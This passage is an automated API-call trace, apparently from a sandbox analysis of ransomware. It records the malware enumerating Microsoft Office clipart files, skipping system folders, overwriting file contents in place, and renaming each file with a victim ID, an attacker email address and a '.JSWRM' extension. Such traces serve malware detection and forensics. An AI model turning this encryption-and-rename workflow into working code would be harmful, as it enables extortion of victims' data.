cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.155] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45358) returned 1 [0086.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb120) returned 0x24d210 [0086.155] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb120, lpOverlapped=0x0) returned 1 [0086.160] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.160] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb120, lpOverlapped=0x0) returned 1 [0086.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.161] CloseHandle (hObject=0x314) returned 1 [0086.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0086.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0086.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0086.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.163] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd902, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0177806.JPG", cAlternateFileName="")) returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2=".") returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="..") returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="...") returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="windows") returned -1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="recovery") returned -1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="perflogs") returned -1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="documents and settings") returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="system volume information") returned -1 [0086.163] lstrcmpiW (lpString1="J0177806.JPG", lpString2="msocache") returned -1 [0086.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177806.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177806.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0177806.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177806.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177806.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0177806.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.164] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55554) returned 1 [0086.164] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd900) returned 0x24d210 [0086.165] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd900, lpOverlapped=0x0) returned 1 [0086.170] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.170] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd900, lpOverlapped=0x0) returned 1 [0086.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.171] CloseHandle (hObject=0x314) returned 1 [0086.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0086.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0086.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0086.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0086.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0086.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.172] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0086.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.173] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x907d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178348.JPG", cAlternateFileName="")) returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2=".") returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="..") returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="...") returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="windows") returned -1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="recovery") returned -1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="perflogs") returned -1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="documents and settings") returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="system volume information") returned -1 [0086.173] lstrcmpiW (lpString1="J0178348.JPG", lpString2="msocache") returned -1 [0086.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178348.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178348.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178348.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178348.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178348.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178348.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.174] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36989) returned 1 [0086.174] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9070) returned 0x24d210 [0086.175] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9070, lpOverlapped=0x0) returned 1 [0086.179] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.179] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9070, lpOverlapped=0x0) returned 1 [0086.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.180] CloseHandle (hObject=0x314) returned 1 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0086.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0086.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0086.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.181] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7214, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178459.JPG", cAlternateFileName="")) returned 1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2=".") returned 1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2="..") returned 1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2="...") returned 1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2="windows") returned -1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2="recovery") returned -1 [0086.181] lstrcmpiW (lpString1="J0178459.JPG", lpString2="perflogs") returned -1 [0086.182] lstrcmpiW (lpString1="J0178459.JPG", lpString2="documents and settings") returned 1 [0086.182] lstrcmpiW (lpString1="J0178459.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.182] lstrcmpiW (lpString1="J0178459.JPG", lpString2="system volume information") returned -1 [0086.182] lstrcmpiW (lpString1="J0178459.JPG", lpString2="msocache") returned -1 [0086.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178459.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178459.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178459.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0086.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178459.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178459.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178459.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0086.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.183] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29204) returned 1 [0086.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7210) returned 0x24d210 [0086.184] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7210, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.187] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7210, lpOverlapped=0x0) returned 1 [0086.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.188] CloseHandle (hObject=0x314) returned 1 [0086.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.188] MultiByteToWideChar (in: CodePage=0x0, 